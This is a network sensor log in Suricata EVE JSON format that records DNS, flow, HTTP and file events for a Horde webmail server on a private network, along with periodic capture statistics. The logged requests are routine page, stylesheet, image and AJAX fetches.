{"timestamp":"2020-02-29T00:00:09.690288+0000","flow_id":1310461790902159,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44297,"proto":"UDP","dns":{"type":"answer","id":62651,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:09.744651+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52622,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; 
Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3423}} {"timestamp":"2020-02-29T00:00:11.000743+0000","flow_id":1483686392296336,"event_type":"flow","src_ip":"192.168.10.122","src_port":41143,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:55:10.848784+0000","end":"2020-02-28T23:55:10.956521+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:11.001125+0000","flow_id":953872111526551,"event_type":"flow","src_ip":"192.168.10.122","src_port":46841,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:10.746135+0000","end":"2020-02-28T23:55:10.857663+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:11.906251+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52622,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3423},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18034,"tx_id":0}} 
{"timestamp":"2020-02-29T00:00:11.917081+0000","flow_id":2128300873612889,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33617,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":48664,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:12.027870+0000","flow_id":2128300873612889,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33617,"proto":"UDP","dns":{"type":"answer","id":48664,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:12.027870+0000","flow_id":2128300873612889,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33617,"proto":"UDP","dns":{"type":"answer","id":48664,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:12.138061+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52622,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3798}} {"timestamp":"2020-02-29T00:00:12.183305+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52622,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3798},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20554,"tx_id":1}} {"timestamp":"2020-02-29T00:00:12.186770+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52622,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2951}} {"timestamp":"2020-02-29T00:00:12.188718+0000","flow_id":67704414066182,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52624,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/basic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1633}} {"timestamp":"2020-02-29T00:00:12.224277+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52622,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2951},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":12657,"tx_id":2}} {"timestamp":"2020-02-29T00:00:12.224594+0000","flow_id":67704414066182,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52624,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/basic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1633},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/basic\/screen.css","state":"CLOSED","stored":false,"size":6255,"tx_id":0}} {"timestamp":"2020-02-29T00:00:12.226518+0000","flow_id":1743257055554502,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52626,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-right-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":161}} {"timestamp":"2020-02-29T00:00:12.265633+0000","flow_id":67704414066182,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52624,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-center-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; 
rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":103}} {"timestamp":"2020-02-29T00:00:12.265685+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52622,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-left-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":179}} {"timestamp":"2020-02-29T00:00:12.310542+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52622,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-left-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":179},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-left-active.png","state":"CLOSED","stored":false,"size":179,"tx_id":3}} {"timestamp":"2020-02-29T00:00:12.311477+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52622,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:00:14.000165+0000","event_type":"stats","stats":{"uptime":13666,"capture":{"kernel_packets":131707,"kernel_drops":0},"decoder":{"pkts":131749,"bytes":91582877,"invalid":175,"ipv4":130334,"ipv6":8,"ethernet":131749,"raw":0,"null":0,"sll":0,"tcp":125405,"udp":4740,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":695,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2645,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2661,"synack":2652,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":134,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1693,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2159,"failed_udp":106},"tx":{"http":4372,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2235}},"flow_mgr":{"closed_pruned":2615,"new_pruned":15,"est_pruned":2209,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":2,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18848,"memcap_state":0,"memcap_global":0},"http":{"memuse":174216,"memcap":0}}} 
{"timestamp":"2020-02-29T00:00:14.001000+0000","flow_id":1593959677759463,"event_type":"flow","src_ip":"192.168.10.122","src_port":32817,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:55:13.724967+0000","end":"2020-02-28T23:55:13.836542+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:16.606407+0000","flow_id":859219642302663,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44592,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":58242,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:16.717444+0000","flow_id":859219642302663,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44592,"proto":"UDP","dns":{"type":"answer","id":58242,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:16.717444+0000","flow_id":859219642302663,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44592,"proto":"UDP","dns":{"type":"answer","id":58242,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:16.743012+0000","flow_id":452932915956904,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34}} {"timestamp":"2020-02-29T00:00:16.743012+0000","flow_id":452932915956904,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":10,"tx_id":0}} {"timestamp":"2020-02-29T00:00:17.229309+0000","flow_id":67704414066182,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52624,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-center-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":103},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-center-active.png","state":"CLOSED","stored":false,"size":103,"tx_id":1}} 
{"timestamp":"2020-02-29T00:00:17.231489+0000","flow_id":1743257055554502,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52626,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-right-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":161},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-right-active.png","state":"CLOSED","stored":false,"size":161,"tx_id":0}} {"timestamp":"2020-02-29T00:00:17.316883+0000","flow_id":937559845345076,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52622,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":4}} {"timestamp":"2020-02-29T00:00:17.808975+0000","flow_id":1375826898671631,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34211,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":57151,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:00:17.914037+0000","flow_id":1375826898671631,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34211,"proto":"UDP","dns":{"type":"answer","id":57151,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:17.914037+0000","flow_id":1375826898671631,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34211,"proto":"UDP","dns":{"type":"answer","id":57151,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:18.056280+0000","flow_id":1683591370237100,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52628,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5318}} {"timestamp":"2020-02-29T00:00:18.115962+0000","flow_id":1683591370237100,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52628,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5318},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23007,"tx_id":0}} 
{"timestamp":"2020-02-29T00:00:18.119305+0000","flow_id":1683591370237100,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52628,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/folderprefs.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":852}} {"timestamp":"2020-02-29T00:00:19.000671+0000","flow_id":1343567395055843,"event_type":"flow","src_ip":"192.168.10.130","src_port":34674,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1164,"bytes_toclient":643,"start":"2020-02-28T23:59:12.944355+0000","end":"2020-02-28T23:59:18.097765+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:00:21.000249+0000","event_type":"stats","stats":{"uptime":13673,"capture":{"kernel_packets":131776,"kernel_drops":0},"decoder":{"pkts":131789,"bytes":91594733,"invalid":175,"ipv4":130374,"ipv6":8,"ethernet":131789,"raw":0,"null":0,"sll":0,"tcp":125441,"udp":4744,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":695,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2647,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2663,"synack":2654,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":134,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1695,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2161,"failed_udp":106},"tx":{"http":4375,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2237}},"flow_mgr":{"closed_pruned":2615,"new_pruned":15,"est_pruned":2210,"bypassed_pruned":0,"flows_checked":6,"flows_notimeout":6,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65530,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":19178,"memcap_state":0,"memcap_global":0},"http":{"memuse":75516,"memcap":0}}} 
{"timestamp":"2020-02-29T00:00:21.001336+0000","flow_id":481520212261976,"event_type":"flow","src_ip":"192.168.10.130","src_port":34670,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":11,"bytes_toserver":2135,"bytes_toclient":6655,"start":"2020-02-28T23:58:44.932952+0000","end":"2020-02-28T23:59:20.376358+0000","age":36,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:00:21.747956+0000","flow_id":452932915956904,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=kNRoyzspsLUkqfA8aZJfxcp&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":34},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":14,"tx_id":0}} {"timestamp":"2020-02-29T00:00:23.124284+0000","flow_id":1683591370237100,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52628,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/folderprefs.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":852},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/folderprefs.js","state":"CLOSED","stored":false,"size":1991,"tx_id":1}} {"timestamp":"2020-02-29T00:00:24.004707+0000","flow_id":682082286951048,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"159.203.8.72","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-28T23:55:23.449160+0000","end":"2020-02-28T23:55:23.561958+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:25.000767+0000","flow_id":1255138313859760,"event_type":"flow","src_ip":"192.168.10.130","src_port":34676,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":10,"bytes_toserver":1894,"bytes_toclient":6334,"start":"2020-02-28T23:59:19.094896+0000","end":"2020-02-28T23:59:24.514097+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:00:28.000202+0000","event_type":"stats","stats":{"uptime":13680,"capture":{"kernel_packets":131791,"kernel_drops":0},"decoder":{"pkts":131794,"bytes":91595063,"invalid":175,"ipv4":130379,"ipv6":8,"ethernet":131794,"raw":0,"null":0,"sll":0,"tcp":125446,"udp":4744,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":694,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2647,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2663,"synack":2654,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":134,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1695,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2161,"failed_udp":106},"tx":{"http":4375,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2237}},"flow_mgr":{"closed_pruned":2618,"new_pruned":15,"est_pruned":2211,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":19178,"memcap_state":0,"memcap_global":0},"http":{"memuse":23758,"memcap":0}}} 
